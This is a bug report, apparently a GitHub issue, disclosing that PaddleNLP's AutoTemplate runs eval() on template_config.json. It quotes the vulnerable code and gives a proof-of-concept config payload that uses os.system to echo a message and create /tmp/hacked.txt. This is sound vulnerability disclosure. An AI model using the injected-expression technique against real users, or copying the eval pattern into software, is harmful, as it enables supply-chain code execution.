-
Notifications
You must be signed in to change notification settings - Fork 3.1k
[Bug]: Potential code execution when handling untrusted template_config.json via AutoTemplate #11212
Description
软件环境
paddle2onnx 2.1.0
paddlefsl 1.1.0
paddlenlp 2.8.1
paddlepaddle 3.3.0重复问题
- I have searched the existing issues
错误描述
The AutoTemplate component unsafely processes external template configuration files by evaluating their content using Python’s eval() function.
When users attempt to do a text classification task, paddlenlp could read template_config.json and pass its contents to Template.parse_template_string().
PaddleNLP/paddlenlp/prompt/template.py
Lines 851 to 866 in 587a5cd
| def load_from( | |
| cls, data_path: os.PathLike, tokenizer: PretrainedTokenizer, max_length: int, model: PretrainedModel = None | |
| ): | |
| template_config_file = os.path.join(data_path, TEMPLATE_CONFIG_FILE) | |
| if not os.path.isfile(template_config_file): | |
| raise ValueError("{} not found under {}".format(TEMPLATE_CONFIG_FILE, data_path)) | |
| with open(template_config_file, "r", encoding="utf-8") as fp: | |
| config = [x.strip() for x in fp] | |
| prompt = json.loads(config[0]) | |
| if len(config) > 1: | |
| template_class = json.loads(config[1])["class"] | |
| else: | |
| template_class = None # Compatible with previous versions | |
| template = cls.create_from( | |
| prompt=prompt, tokenizer=tokenizer, max_length=max_length, model=model, template_class=template_class | |
| ) |
Inside this function, substrings wrapped in {} are directly evaluated as Python code using eval().
PaddleNLP/paddlenlp/prompt/template.py
Lines 320 to 336 in 587a5cd
| # Parse blocks with paired tokens like "{ }". | |
| if prompt[index] == left_token: | |
| left_index = index | |
| while index < len(prompt): | |
| if prompt[index] == left_token: | |
| left_stack.append(index) | |
| elif prompt[index] == right_token: | |
| left_stack.pop() | |
| if len(left_stack) == 0: | |
| break | |
| index += 1 | |
| if index == len(prompt) and len(left_stack) > 0: | |
| raise ValueError( | |
| "{} at position {} has no corresponding {}".format(left_token, left_index, right_token) | |
| ) | |
| try: | |
| part_dict = eval(prompt[left_index : index + 1]) |
An attacker can publish a malicious model repository containing a malicious template_config.json file with embedded Python expressions. When a victim loads the model using standard PaddleNLP APIs (e.g., Taskflow), the malicious payload is evaluated and executed automatically.
This issue turns external template configuration files into attack vectors and presents a supply-chain security risk. The payload is hidden in auxiliary configuration files rather than model weights, allowing it to bypass many existing security checks.
稳定复现步骤 & 代码
I built a proof-of-concept repository for demonstration.
git clone https://huggingface.co/XManFromXlab/paddlenlp-AutoTemplate-RCEThe payload looks like this:
"{os.system('echo \"You have been hacked!!!\" && touch /tmp/hacked.txt')}"
Once victims run the following code:
from paddlenlp import Taskflow
Taskflow("text_classification", mode="prompt", task_path="./paddlenlp-AutoTemplate-RCE")It would print the warning message You have been hacked!!! and create an empty file /tmp/hacked.txt.